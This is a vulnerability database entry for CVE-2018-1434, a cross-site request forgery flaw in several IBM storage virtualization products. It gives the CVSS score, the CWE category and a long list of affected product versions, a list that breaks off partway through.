CVE-2018-1434
CVSS6.8
发布时间 :2018-05-17 17:29:00
修订时间 :2018-06-15 15:13:21
NMPS    

[原文]IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products ( 6.1, 6.2, 6.3, 6.4, 7.1, 7.2, 7.3, 7.4, 7.5, 7.6, 7.6.1, 7.7, 7.7.1, 7.8, 7.8.1, 8.1, and 8.1.1) are vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 139474.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-352 [跨站请求伪造(CSRF)]

- CPE (受影响的平台与产品)

cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.5
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.6
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.7
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.8
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.9
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.10
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.11
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.12
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.5.0.13
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.0.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.0.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.0.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.0.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.0.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.5
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.6
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.7
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.6.1.8
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.0.5
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.5
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.6
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.7
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.8
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.7.1.9
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.0.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.0.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.0.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.3
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.4
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.5
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:7.8.1.6
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.0.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.0.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.0.2
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.1.0
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.1.1
cpe:/a:ibm:spectrum_virtualize_for_public_cloud_software:8.1.1.2
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.0
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.1
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.2
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.3
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.4
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.5
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.6
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.7
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.8
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.9
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.10
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.11
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.12
cpe:/a:ibm:spectrum_virtualize_software:7.5.0.13
cpe:/a:ibm:spectrum_virtualize_software:7.6.0.0
cpe:/a:ibm:spectrum_virtualize_software:7.6.0.1
cpe:/a:ibm:spectrum_virtualize_software:7.6.0.2
cpe:/a:ibm:spectrum_virtualize_software:7.6.0.3
cpe:/a:ibm:spectrum_virtualize_software:7.6.0.4
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.0
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.1
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.2
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.3
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.4
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.5
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.6
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.7
cpe:/a:ibm:spectrum_virtualize_software:7.6.1.8
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.0
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.1
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.2
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.3
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.4
cpe:/a:ibm:spectrum_virtualize_software:7.7.0.5
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.0
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.1
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.2
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.3
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.4
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.5
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.6
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.7
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.8
cpe:/a:ibm:spectrum_virtualize_software:7.7.1.9
cpe:/a:ibm:spectrum_virtualize_software:7.8.0.0
cpe:/a:ibm:spectrum_virtualize_software:7.8.0.1
cpe:/a:ibm:spectrum_virtualize_software:7.8.0.2
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.0
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.1
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.2
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.3
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.4
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.5
cpe:/a:ibm:spectrum_virtualize_software:7.8.1.6
cpe:/a:ibm:spectrum_virtualize_software:8.1.0.0
cpe:/a:ibm:spectrum_virtualize_software:8.1.0.1
cpe:/a:ibm:spectrum_virtualize_software:8.1.0.2
cpe:/a:ibm:spectrum_virtualize_software:8.1.1.0
cpe:/a:ibm:spectrum_virtualize_software:8.1.1.1
cpe:/a:ibm:spectrum_virtualize_software:8.1.1.2
cpe:/a:ibm:storwize_v3500_software:6.1.0.0
cpe:/a:ibm:storwize_v3500_software:6.1.0.1
cpe:/a:ibm:storwize_v3500_software:6.1.0.2
cpe:/a:ibm:storwize_v3500_software:6.1.0.3
cpe:/a:ibm:storwize_v3500_software:6.1.0.4
cpe:/a:ibm:storwize_v3500_software:6.1.0.5
cpe:/a:ibm:storwize_v3500_software:6.1.0.6
cpe:/a:ibm:storwize_v3500_software:6.1.0.7
cpe:/a:ibm:storwize_v3500_software:6.1.0.8
cpe:/a:ibm:storwize_v3500_software:6.1.0.9
cpe:/a:ibm:storwize_v3500_software:6.1.0.10
cpe:/a:ibm:storwize_v3500_software:6.2.0.0
cpe:/a:ibm:storwize_v3500_software:6.2.0.1
cpe:/a:ibm:storwize_v3500_software:6.2.0.2
cpe:/a:ibm:storwize_v3500_software:6.2.0.3
cpe:/a:ibm:storwize_v3500_software:6.2.0.4
cpe:/a:ibm:storwize_v3500_software:6.2.0.5
cpe:/a:ibm:storwize_v3500_software:6.2.0.6
cpe:/a:ibm:storwize_v3500_software:6.3.0.0
cpe:/a:ibm:storwize_v3500_software:6.3.0.1
cpe:/a:ibm:storwize_v3500_software:6.3.0.2
cpe:/a:ibm:storwize_v3500_software:6.3.0.3
cpe:/a:ibm:storwize_v3500_software:6.3.0.4
cpe:/a:ibm:storwize_v3500_software:6.3.0.5
cpe:/a:ibm:storwize_v3500_software:6.3.0.6
cpe:/a:ibm:storwize_v3500_software:6.3.0.7
cpe:/a:ibm:storwize_v3500_software:6.4.0.0
cpe:/a:ibm:storwize_v3500_software:6.4.0.1
cpe:/a:ibm:storwize_v3500_software:6.4.0.2
cpe:/a:ibm:storwize_v3500_software:6.4.0.3
cpe:/a:ibm:storwize_v3500_software:6.4.0.4
cpe:/a:ibm:storwize_v3500_software:6.4.1.1
cpe:/a:ibm:storwize_v3500_software:6.4.1.2
cpe:/a:ibm:storwize_v3500_software:6.4.1.3
cpe:/a:ibm:storwize_v3500_software:6.4.1.4
cpe:/a:ibm:storwize_v3500_software:6.4.1.5
cpe:/a:ibm:storwize_v3500_software:6.4.1.6
cpe:/a:ibm:storwize_v3500_software:6.4.1.7
cpe:/a:ibm:storwize_v3500_software:6.4.1.8
cpe:/a:ibm:storwize_v3500_software:6.4.1.9
cpe:/a:ibm:storwize_v3500_software:6.4.1.10
cpe:/a:ibm:storwize_v3500_software:7.1.0.0
cpe:/a:ibm:storwize_v3500_software:7.1.0.1
cpe:/a:ibm:storwize_v3500_software:7.1.0.2
cpe:/a:ibm:storwize_v3500_software:7.1.0.3
cpe:/a:ibm:storwize_v3500_software:7.1.0.4
cpe:/a:ibm:storwize_v3500_software:7.1.0.5
cpe:/a:ibm:storwize_v3500_software:7.1.0.6
cpe:/a:ibm:storwize_v3500_software:7.1.0.7
cpe:/a:ibm:storwize_v3500_software:7.1.0.8
cpe:/a:ibm:storwize_v3500_software:7.1.0.9
cpe:/a:ibm:storwize_v3500_software:7.1.0.10
cpe:/a:ibm:storwize_v3500_software:7.1.0.11
cpe:/a:ibm:storwize_v3500_software:7.1.0.12
cpe:/a:ibm:storwize_v3500_software:7.2.0.0
cpe:/a:ibm:storwize_v3500_software:7.2.0.1
cpe:/a:ibm:storwize_v3500_software:7.2.0.2
cpe:/a:ibm:storwize_v3500_software:7.2.0.3
cpe:/a:ibm:storwize_v3500_software:7.2.0.4
cpe:/a:ibm:storwize_v3500_software:7.2.0.5
cpe:/a:ibm:storwize_v3500_software:7.2.0.6
cpe:/a:ibm:storwize_v3500_software:7.2.0.7
cpe:/a:ibm:storwize_v3500_software:7.2.0.8
cpe:/a:ibm:storwize_v3500_software:7.2.0.9
cpe:/a:ibm:storwize_v3500_software:7.2.0.10
cpe:/a:ibm:storwize_v3500_software:7.2.0.11
cpe:/a:ibm:storwize_v3500_software:7.2.0.12
cpe:/a:ibm:storwize_v3500_software:7.3.0.0
cpe:/a:ibm:storwize_v3500_software:7.3.0.1
cpe:/a:ibm:storwize_v3500_software:7.3.0.2
cpe:/a:ibm:storwize_v3500_software:7.3.0.3
cpe:/a:ibm:storwize_v3500_software:7.3.0.4
cpe:/a:ibm:storwize_v3500_software:7.3.0.5
cpe:/a:ibm:storwize_v3500_software:7.3.0.6
cpe:/a:ibm:storwize_v3500_software:7.3.0.7
cpe:/a:ibm:storwize_v3500_software:7.3.0.8
cpe:/a:ibm:storwize_v3500_software:7.3.0.9
cpe:/a:ibm:storwize_v3500_software:7.3.0.10
cpe:/a:ibm:storwize_v3500_software:7.3.0.11
cpe:/a:ibm:storwize_v3500_software:7.3.0.12
cpe:/a:ibm:storwize_v3500_software:7.3.0.13
cpe:/a:ibm:storwize_v3500_software:7.4.0.0
cpe:/a:ibm:storwize_v3500_software:7.4.0.1
cpe:/a:ibm:storwize_v3500_software:7.4.0.2
cpe:/a:ibm:storwize_v3500_software:7.4.0.3
cpe:/a:ibm:storwize_v3500_software:7.4.0.4
cpe:/a:ibm:storwize_v3500_software:7.4.0.5
cpe:/a:ibm:storwize_v3500_software:7.4.0.6
cpe:/a:ibm:storwize_v3500_software:7.4.0.7
cpe:/a:ibm:storwize_v3500_software:7.4.0.8
cpe:/a:ibm:storwize_v3500_software:7.4.0.9
cpe:/a:ibm:storwize_v3500_software:7.4.0.10
cpe:/a:ibm:storwize_v3500_software:7.4.0.11
cpe:/a:ibm:storwize_v3500_software:7.5.0.0
cpe:/a:ibm:storwize_v3500_software:7.5.0.1
cpe:/a:ibm:storwize_v3500_software:7.5.0.2
cpe:/a:ibm:storwize_v3500_software:7.5.0.3
cpe:/a:ibm:storwize_v3500_software:7.5.0.4
cpe:/a:ibm:storwize_v3500_software:7.5.0.5
cpe:/a:ibm:storwize_v3500_software:7.5.0.6
cpe:/a:ibm:storwize_v3500_software:7.5.0.7
cpe:/a:ibm:storwize_v3500_software:7.5.0.8
cpe:/a:ibm:storwize_v3500_software:7.5.0.9
cpe:/a:ibm:storwize_v3500_software:7.5.0.10
cpe:/a:ibm:storwize_v3500_software:7.5.0.11
cpe:/a:ibm:storwize_v3500_software:7.5.0.12
cpe:/a:ibm:storwize_v3500_software:7.5.0.13
cpe:/a:ibm:storwize_v3500_software:7.6.0.0
cpe:/a:ibm:storwize_v3500_software:7.6.0.1
cpe:/a:ibm:storwize_v3500_software:7.6.0.2
cpe:/a:ibm:storwize_v3500_software:7.6.0.3
cpe:/a:ibm:storwize_v3500_software:7.6.0.4
cpe:/a:ibm:storwize_v3500_software:7.6.1.0
cpe:/a:ibm:storwize_v3500_software:7.6.1.1
cpe:/a:ibm:storwize_v3500_software:7.6.1.2
cpe:/a:ibm:storwize_v3500_software:7.6.1.3
cpe:/a:ibm:storwize_v3500_software:7.6.1.4
cpe:/a:ibm:storwize_v3500_software:7.6.1.5
cpe:/a:ibm:storwize_v3500_software:7.6.1.6
cpe:/a:ibm:storwize_v3500_software:7.6.1.7
cpe:/a:ibm:storwize_v3500_software:7.6.1.8
cpe:/a:ibm:storwize_v3500_software:7.7.0.0
cpe:/a:ibm:storwize_v3500_software:7.7.0.1
cpe:/a:ibm:storwize_v3500_software:7.7.0.2
cpe:/a:ibm:storwize_v3500_software:7.7.0.3
cpe:/a:ibm:storwize_v3500_software:7.7.0.4
cpe:/a:ibm:storwize_v3500_software:7.7.0.5
cpe:/a:ibm:storwize_v3500_software:7.7.1.0
cpe:/a:ibm:storwize_v3500_software:7.7.1.1
cpe:/a:ibm:storwize_v3500_software:7.7.1.2
cpe:/a:ibm:storwize_v3500_software:7.7.1.3
cpe:/a:ibm:storwize_v3500_software:7.7.1.4
cpe:/a:ibm:storwize_v3500_software:7.7.1.5
cpe:/a:ibm:storwize_v3500_software:7.7.1.6
cpe:/a:ibm:storwize_v3500_software:7.7.1.7
cpe:/a:ibm:storwize_v3500_software:7.7.1.8
cpe:/a:ibm:storwize_v3500_software:7.7.1.9
cpe:/a:ibm:storwize_v3500_software:7.8.0.0
cpe:/a:ibm:storwize_v3500_software:7.8.0.1
cpe:/a:ibm:storwize_v3500_software:7.8.0.2
cpe:/a:ibm:storwize_v3500_software:7.8.1.0
cpe:/a:ibm:storwize_v3500_software:7.8.1.1
cpe:/a:ibm:storwize_v3500_software:7.8.1.2
cpe:/a:ibm:storwize_v3500_software:7.8.1.3
cpe:/a:ibm:storwize_v3500_software:7.8.1.4
cpe:/a:ibm:storwize_v3500_software:7.8.1.5
cpe:/a:ibm:storwize_v3500_software:7.8.1.6
cpe:/a:ibm:storwize_v3500_software:8.1.0.0
cpe:/a:ibm:storwize_v3500_software:8.1.0.1
cpe:/a:ibm:storwize_v3500_software:8.1.0.2
cpe:/a:ibm:storwize_v3500_software:8.1.1.0
cpe:/a:ibm:storwize_v3500_software:8.1.1.1
cpe:/a:ibm:storwize_v3500_software:8.1.1.2
cpe:/a:ibm:storwize_v3700_software:6.1.0.0
cpe:/a:ibm:storwize_v3700_software:6.1.0.1
cpe:/a:ibm:storwize_v3700_software:6.1.0.2
cpe:/a:ibm:storwize_v3700_software:6.1.0.3
cpe:/a:ibm:storwize_v3700_software:6.1.0.4
cpe:/a:ibm:storwize_v3700_software:6.1.0.5
cpe:/a:ibm:storwize_v3700_software:6.1.0.6
cpe:/a:ibm:storwize_v3700_software:6.1.0.7
cpe:/a:ibm:storwize_v3700_software:6.1.0.8
cpe:/a:ibm:storwize_v3700_software:6.1.0.9
cpe:/a:ibm:storwize_v3700_software:6.1.0.10
cpe:/a:ibm:storwize_v3700_software:6.2.0.0
cpe:/a:ibm:storwize_v3700_software:6.2.0.1
cpe:/a:ibm:storwize_v3700_software:6.2.0.2
cpe:/a:ibm:storwize_v3700_software:6.2.0.3
cpe:/a:ibm:storwize_v3700_software:6.2.0.4
cpe:/a:ibm:storwize_v3700_software:6.2.0.5
cpe:/a:ibm:storwize_v3700_software:6.2.0.6
cpe:/a:ibm:storwize_v3700_software:6.3.0.0
cpe:/a:ibm:storwize_v3700_software:6.3.0.1
cpe:/a:ibm:storwize_v3700_software:6.3.0.2
cpe:/a:ibm:storwize_v3700_software:6.3.0.3
cpe:/a:ibm:storwize_v3700_software:6.3.0.4
cpe:/a:ibm:storwize_v3700_software:6.3.0.5
cpe:/a:ibm:storwize_v3700_software:6.3.0.6
cpe:/a:ibm:storwize_v3700_software:6.3.0.7
cpe:/a:ibm:storwize_v3700_software:6.4.0.0
cpe:/a:ibm:storwize_v3700_software:6.4.0.1
cpe:/a:ibm:storwize_v3700_software:6.4.0.2
cpe:/a:ibm:storwize_v3700_software:6.4.0.3
cpe:/a:ibm:storwize_v3700_software:6.4.0.4
cpe:/a:ibm:storwize_v3700_software:6.4.1.1
cpe:/a:ibm:storwize_v3700_software:6.4.1.2
cpe:/a:ibm:storwize_v3700_software:6.4.1.3
cpe:/a:ibm:storwize_v3700_software:6.4.1.4
cpe:/a:ibm:storwize_v3700_software:6.4.1.5
cpe:/a:ibm:storwize_v3700_software:6.4.1.6
cpe:/a:ibm:storwize_v3700_software:6.4.1.7
cpe:/a:ibm:storwize_v3700_software:6.4.1.8
cpe:/a:ibm:storwize_v3700_software:6.4.1.9
cpe:/a:ibm:storwize_v3700_software:6.4.1.10
cpe:/a:ibm:storwize_v3700_software:7.1.0.0
cpe:/a:ibm:storwize_v3700_software:7.1.0.1
cpe:/a:ibm:storwize_v3700_software:7.1.0.2
cpe:/a:ibm:storwize_v3700_software:7.1.0.3
cpe:/a:ibm:storwize_v3700_software:7.1.0.4
cpe:/a:ibm:storwize_v3700_software:7.1.0.5
cpe:/a:ibm:storwize_v3700_software:7.1.0.6
cpe:/a:ibm:storwize_v3700_software:7.1.0.7
cpe:/a:ibm:storwize_v3700_software:7.1.0.8
cpe:/a:ibm:storwize_v3700_software:7.1.0.9
cpe:/a:ibm:storwize_v3700_software:7.1.0.10
cpe:/a:ibm:storwize_v3700_software:7.1.0.11
cpe:/a:ibm:storwize_v3700_software:7.1.0.12
cpe:/a:ibm:storwize_v3700_software:7.2.0.0
cpe:/a:ibm:storwize_v3700_software:7.2.0.1
cpe:/a:ibm:storwize_v3700_software:7.2.0.2
cpe:/a:ibm:storwize_v3700_software:7.2.0.3
cpe:/a:ibm:storwize_v3700_software:7.2.0.4
cpe:/a:ibm:storwize_v3700_software:7.2.0.5
cpe:/a:ibm:storwize_v3700_software:7.2.0.6
cpe:/a:ibm:storwize_v3700_software:7.2.0.7
cpe:/a:ibm:storwize_v3700_software:7.2.0.8
cpe:/a:ibm:storwize_v3700_software:7.2.0.9
cpe:/a:ibm:storwize_v3700_software:7.2.0.10
cpe:/a:ibm:storwize_v3700_software:7.2.0.11
cpe:/a:ibm:storwize_v3700_software:7.2.0.12
cpe:/a:ibm:storwize_v3700_software:7.3.0.0
cpe:/a:ibm:storwize_v3700_software:7.3.0.1
cpe:/a:ibm:storwize_v3700_software:7.3.0.2
cpe:/a:ibm:storwize_v3700_software:7.3.0.3
cpe:/a:ibm:storwize_v3700_software:7.3.0.4
cpe:/a:ibm:storwize_v3700_software:7.3.0.5
cpe:/a:ibm:storwize_v3700_software:7.3.0.6
cpe:/a:ibm:storwize_v3700_software:7.3.0.7
cpe:/a:ibm:storwize_v3700_software:7.3.0.8
cpe:/a:ibm:storwize_v3700_software:7.3.0.9
cpe:/a:ibm:storwize_v3700_software:7.3.0.10
cpe:/a:ibm:storwize_v3700_software:7.3.0.11
cpe:/a:ibm:storwize_v3700_software:7.3.0.12
cpe:/a:ibm:storwize_v3700_software:7.3.0.13
cpe:/a:ibm:storwize_v3700_software:7.4.0.0
cpe:/a:ibm:storwize_v3700_software:7.4.0.1
cpe:/a:ibm:storwize_v3700_software:7.4.0.2
cpe:/a:ibm:storwize_v3700_software:7.4.0.3
cpe:/a:ibm:storwize_v3700_software:7.4.0.4
cpe:/a:ibm:storwize_v3700_software:7.4.0.5
cpe:/a:ibm:storwize_v3700_software:7.4.0.6
cpe:/a:ibm:storwize_v3700_software:7.4.0.7
cpe:/a:ibm:storwize_v3700_software:7.4.0.8
cpe:/a:ibm:storwize_v3700_software:7.4.0.9
cpe:/a:ibm:storwize_v3700_software:7.4.0.10
cpe:/a:ibm:storwize_v3700_software:7.4.0.11
cpe:/a:ibm:storwize_v3700_software:7.5.0.0
cpe:/a:ibm:storwize_v3700_software:7.5.0.1
cpe:/a:ibm:storwize_v3700_software:7.5.0.2
cpe:/a:ibm:storwize_v3700_software:7.5.0.3
cpe:/a:ibm:storwize_v3700_software:7.5.0.4
cpe:/a:ibm:storwize_v3700_software:7.5.0.5
cpe:/a:ibm:storwize_v3700_software:7.5.0.6
cpe:/a:ibm:storwize_v3700_software:7.5.0.7
cpe:/a:ibm:storwize_v3700_software:7.5.0.8
cpe:/a:ibm:storwize_v3700_software:7.5.0.9
cpe:/a:ibm:storwize_v3700_software:7.5.0.10
cpe:/a:ibm:storwize_v3700_software:7.5.0.11
cpe:/a:ibm:storwize_v3700_software:7.5.0.12
cpe:/a:ibm:storwize_v3700_software:7.5.0.13
cpe:/a:ibm:storwize_v3700_software:7.6.0.0
cpe:/a:ibm:storwize_v3700_software:7.6.0.1
cpe:/a:ibm:storwize_v3700_software:7.6.0.2
cpe:/a:ibm:storwize_v3700_software:7.6.0.3
cpe:/a:ibm:storwize_v3700_software:7.6.0.4
cpe:/a:ibm:storwize_v3700_software:7.6.1.0
cpe:/a:ibm:storwize_v3700_software:7.6.1.1
cpe:/a:ibm:storwize_v3700_software:7.6.1.2
cpe:/a:ibm:storwize_v3700_software:7.6.1.3
cpe:/a:ibm:storwize_v3700_software:7.6.1.4
cpe:/a:ibm:storwize_v3700_software:7.6.1.5
cpe:/a:ibm:storwize_v3700_software:7.6.1.6
cpe:/a:ibm:storwize_v3700_software:7.6.1.7
cpe:/a:ibm:storwize_v3700_software:7.6.1.8
cpe:/a:ibm:storwize_v3700_software:7.7.0.0
cpe:/a:ibm:storwize_v3700_software:7.7.0.1
cpe:/a:ibm:storwize_v3700_software:7.7.0.2
cpe:/a:ibm:storwize_v3700_software:7.7.0.3
cpe:/a:ibm:storwize_v3700_software:7.7.0.4
cpe:/a:ibm:storwize_v3700_software:7.7.0.5
cpe:/a:ibm:storwize_v3700_software:7.7.1.0
cpe:/a:ibm:storwize_v3700_software:7.7.1.1
cpe:/a:ibm:storwize_v3700_software:7.7.1.2
cpe:/a:ibm:storwize_v3700_software:7.7.1.3
cpe:/a:ibm:storwize_v3700_software:7.7.1.4
cpe:/a:ibm:storwize_v3700_software:7.7.1.5
cpe:/a:ibm:storwize_v3700_software:7.7.1.6
cpe:/a:ibm:storwize_v3700_software:7.7.1.7
cpe:/a:ibm:storwize_v3700_software:7.7.1.8
cpe:/a:ibm:storwize_v3700_software:7.7.1.9
cpe:/a:ibm:storwize_v3700_software:7.8.0.0
cpe:/a:ibm:storwize_v3700_software:7.8.0.1
cpe:/a:ibm:storwize_v3700_software:7.8.0.2
cpe:/a:ibm:storwize_v3700_software:7.8.1.0
cpe:/a:ibm:storwize_v3700_software:7.8.1.1
cpe:/a:ibm:storwize_v3700_software:7.8.1.2
cpe:/a:ibm:storwize_v3700_software:7.8.1.3
cpe:/a:ibm:storwize_v3700_software:7.8.1.4
cpe:/a:ibm:storwize_v3700_software:7.8.1.5
cpe:/a:ibm:storwize_v3700_software:7.8.1.6
cpe:/a:ibm:storwize_v3700_software:8.1.0.0
cpe:/a:ibm:storwize_v3700_software:8.1.0.1
cpe:/a:ibm:storwize_v3700_software:8.1.0.2
cpe:/a:ibm:storwize_v3700_software:8.1.1.0
cpe:/a:ibm:storwize_v3700_software:8.1.1.1
cpe:/a:ibm:storwize_v3700_software:8.1.1.2
cpe:/a:ibm:storwize_v5000_software:6.1.0.0
cpe:/a:ibm:storwize_v5000_software:6.1.0.1
cpe:/a:ibm:storwize_v5000_software:6.1.0.2
cpe:/a:ibm:storwize_v5000_software:6.1.0.3
cpe:/a:ibm:storwize_v5000_software:6.1.0.4
cpe:/a:ibm:storwize_v5000_software:6.1.0.5
cpe:/a:ibm:storwize_v5000_software:6.1.0.6
cpe:/a:ibm:storwize_v5000_software:6.1.0.7
cpe:/a:ibm:storwize_v5000_software:6.1.0.8
cpe:/a:ibm:storwize_v5000_software:6.1.0.9
cpe:/a:ibm:storwize_v5000_software:6.1.0.10
cpe:/a:ibm:storwize_v5000_software:6.2.0.0
cpe:/a:ibm:storwize_v5000_software:6.2.0.1
cpe:/a:ibm:storwize_v5000_software:6.2.0.2
cpe:/a:ibm:storwize_v5000_software:6.2.0.3
cpe:/a:ibm:storwize_v5000_software:6.2.0.4
cpe:/a:ibm:storwize_v5000_software:6.2.0.5
cpe:/a:ibm:storwize_v5000_software:6.2.0.6
cpe:/a:ibm:storwize_v5000_software:6.3.0.0
cpe:/a:ibm:storwize_v5000_software:6.3.0.1
cpe:/a:ibm:storwize_v5000_software:6.3.0.2
cpe:/a:ibm:storwize_v5000_software:6.3.0.3
cpe:/a:ibm:storwize_v5000_software:6.3.0.4
cpe:/a:ibm:storwize_v5000_software:6.3.0.5
cpe:/a:ibm:storwize_v5000_software:6.3.0.6
cpe:/a:ibm:storwize_v5000_software:6.3.0.7
cpe:/a:ibm:storwize_v5000_software:6.4.0.0
cpe:/a:ibm:storwize_v5000_software:6.4.0.1
cpe:/a:ibm:storwize_v5000_software:6.4.0.2
cpe:/a:ibm:storwize_v5000_software:6.4.0.3
cpe:/a:ibm:storwize_v5000_software:6.4.0.4
cpe:/a:ibm:storwize_v5000_software:6.4.1.1
cpe:/a:ibm:storwize_v5000_software:6.4.1.2
cpe:/a:ibm:storwize_v5000_software:6.4.1.3
cpe:/a:ibm:storwize_v5000_software:6.4.1.4
cpe:/a:ibm:storwize_v5000_software:6.4.1.5
cpe:/a:ibm:storwize_v5000_software:6.4.1.6
cpe:/a:ibm:storwize_v5000_software:6.4.1.7
cpe:/a:ibm:storwize_v5000_software:6.4.1.8
cpe:/a:ibm:storwize_v5000_software:6.4.1.9
cpe:/a:ibm:storwize_v5000_software:6.4.1.10
cpe:/a:ibm:storwize_v5000_software:7.1.0.0
cpe:/a:ibm:storwize_v5000_software:7.1.0.1
cpe:/a:ibm:storwize_v5000_software:7.1.0.2
cpe:/a:ibm:storwize_v5000_software:7.1.0.3
cpe:/a:ibm:storwize_v5000_software:7.1.0.4
